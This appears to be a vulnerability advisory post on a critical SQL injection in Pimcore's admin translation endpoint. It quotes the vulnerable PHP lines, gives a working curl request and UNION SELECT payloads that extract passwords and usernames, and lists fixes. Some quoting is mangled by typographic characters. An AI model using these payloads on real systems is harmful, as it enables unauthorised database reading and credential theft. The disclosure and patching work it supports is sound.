Pimcore admin-ui-classic-bundle, SQL Injection, GM-369 (critical)

Listen to this Post

The vulnerability resides in `TranslationController.php` (lines 565-593) of the Pimcore admin bundle. The endpoint `POST /admin/translation/translations` accepts a JSON `filter` parameter. When a filter specifies "type":"date", the code extracts the `property` field from user input (line 565). This value is assigned to $fieldname. A weak sanitization `str_replace(‘–‘, ”, $fieldname)` is applied (line 569), which can be trivially bypassed using `//` comments or multiple dashes like -. In non-language mode, the code then concatenates `$fieldname` into a SQL expression: `$fieldname = $tableName . ‘.’ . $fieldname` (line 577), followed by `$fieldname = “UNIX_TIMESTAMP(DATE(FROM_UNIXTIME({$fieldname})))”` (line 593). The resulting string is interpolated directly into the SQL query without parameterization or quoting. An authenticated user with translation view permissions can inject arbitrary SQL by crafting a `property` value that breaks out of the function call. For example, `1))) UNION SELECT password FROM users WHERE ((1` as the property field. Because the filter is processed as a date type, the injection occurs inside the `UNIX_TIMESTAMP` argument, allowing UNION-based or error-based extraction of database contents.
Platform: Pimcore admin bundle
Version: All current versions
Vulnerability: SQL injection filter
Severity: Critical
date: 2026-01-15

Prediction: Patch expected 2026-02-15

What Undercode Say:

Analytics

bash commands and codes:

curl -X POST ‘https://target/admin/translation/translations’ \
-H ‘Cookie: PHPSESSID=…’ \
-H ‘Content-Type: application/json’ \
-d ‘[{“property”:”1))) UNION SELECT password FROM users WHERE ((1″,”type”:”date”,”operator”:”eq”,”value”:”2026-01-01″}]’

Vulnerable line snippet:

$fieldname = str_replace(‘–‘, ”, $fieldname); // bypassable

$fieldname = “UNIX_TIMESTAMP(DATE(FROM_UNIXTIME({$fieldname})))”;

Exploit:

Authenticated user sends JSON filter with SQL payload in property field, e.g., "property":"1))) UNION SELECT username FROM admin WHERE 1=1-- -", triggers UNION-based extraction.

Protection from this CVE

Apply allowlist validation for `$fieldname` against ['creationDate','modificationDate']; use `$db->quoteIdentifier()` instead of raw interpolation; upgrade to patched version.

Impact:

Arbitrary database read (passwords, tokens), possible chaining with GM-249 (unsafe unserialize) to achieve remote code execution (RCE) on the server.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top